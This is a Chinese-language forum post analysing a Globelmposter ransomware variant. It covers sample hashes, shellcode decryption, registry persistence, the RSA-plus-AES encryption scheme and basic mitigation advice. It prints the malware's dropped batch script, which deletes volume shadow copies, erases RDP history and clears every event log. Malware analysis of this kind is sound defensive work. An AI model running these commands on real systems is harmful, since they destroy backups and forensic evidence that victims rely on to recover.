跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Globelmposter勒索病毒变种样本分析报告

RenX6
RenX6
木马病毒分析

精选回复

发布于

一.样本概况

1、样本信息

样本来源:http://www.malware-traffic-analysis.net/2017/12/04/index.html

Kaspersky,NOD32,360均报毒:

kdkfxbd3ehi2941.png

     

MD5: 2908715EEC754ABA1AD21414B23CAFB6

SHA1: 4AF27F4B95F29F877D0ABB1167E6B1148C1849BD

CRC32: 64CAEB77

     

2、测试环境及工具

系统环境:win7_7600_x86

工具: Ollydbg,IDA Pro,火绒剑,PChunter。

     

3、病毒行为

进行勒索:

 

wk1fixzftuq2943.png

 

文件加密:

文件加密为.doc后缀。

     

owwcooioy0h2945.png

 

二、具体行为分析

1、特征

Globlemposter家族病毒有两个主要的特征:

ShellCode执行 PE文件释放执行

1.1、拷贝执行ShellCode

fm3gybwfav22947.png

内部采用TEA算法加密ShellCode:

nrlg5n53vev2948.png

dxbsf3rrply2951.png

1.2、Pe文件释放执行

Dump下来的ShellCode,修改0x400000属性为可执行,并释放了PE文件,跳到OEP执行。

wo4ddymq1p32953.png

     

hyuvapqx4ol2954.png

     

2、行为

把PE文件 dump下来分析,先列出其它行为。

2.1、修改注册表 开机启动

复制文件,目录:C:\Users\xxx\AppData\Roaming\PE.exe

设置启动项,键值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck

om2ocrulj5t2956.png

     

24dctf1xbp02957.png

     

1.2、创建.bat文件删除信息

在Temp目录下创建.bat文件,运行.bat文件分别删除卷影、RDP连接历史记录、日志信息。

     

s3fdzyiwlvd2958.png

     

@echo off

vssadmin.exe Delete Shadows /All /Quiet

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

cd %userprofile%\documents\

attrib Default.rdp -s -h

del Default.rdp

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

     

2.3、自删除

cmd 执行 /c del C:\Users\xxx\Desktop\PE.exe 自删除。

     

xli4t2g2qrh2961.png

     

3、文件加密

勒索病毒重点在于加密文件,所以重点对加密文件流程进行分析。

3.1、加密方式

病毒采用的是RSA+AES的加密方式。

一般RSA与AES结合:

cdobzq5umu42962.png

病毒变相的RSA与AES结合:

共有两对RSA公私钥:hac_pri 和 hac_pub,user_pri 和 user_pub。

加密文件的AES密钥。

4h0xt2ckyan2964.png

     

用户ID:包含user_pri。

secret_Ekey:包含secret_key,跟解密的AES有关。

解密过程:

黑客拿到文件后,可以提取 用户ID 和 secret_Ekey。用自身的hac_pri解密用户ID得到user_pri。再用user_pri解密secret_Ekey得到secret_key。

计算文件的IV参数,结合secret_key计算即可得到AES密钥,用以解密文件。

     

3.2、用户ID生成

hack_pub加密成哈希值,做为FileName,创建文件在以下目录。

目录:C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7

哈希值:AE 09 C9 84 DF 6E 74 64 0B 32 71 EA DB 5D D7 C6 5F DE 80 62 35 B2 CD A4 78 E0 EF A9 12 9C 09 E7

hack_pub:

2uk4tflqzzd2966.png

     

加密成hash:

mltuqsfamvf2967.png

     

创建文件:

zbers24ajsy2968.png

 

hack_pub加密User_pri生成用户ID,保存在文件下:

t0mzv3e24gd2969.png

 

3.3、加密文件

创建线程加密文件:

2vihhqvkmai2970.png

遍历文件:

0o0ivnv41ds2971.png

xddmckndeqn2972.png

生成IV参数:

n2s3htkvukv2973.png

     

生成AES密钥:   

a1sti5yydj12974.png

 

用AES密钥加密文件内容并写入文件:

m1tracrqtpy2975.png

 

AES加密:

ja5utwa45g22976.png

mhpqxljng0b2977.png

 

加密 secret_key,并将 secret_Ekey 和 用户ID 写进文件。

tudulffg3jq2978.png

     

三、恶意程序对用户造成的危害

1、加密用户文件,而且文件内容无法恢复。

2、勒索敲诈用户。

四、解决方案(或总结)

3.1 定期备份重要数据。

3.2 安装专业防护软件进行防护。

   

参考文献

http://www.freebuf.com/column/163931.html

http://www.freebuf.com/articles/system/163792.html

   

   

KIDofot

 

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。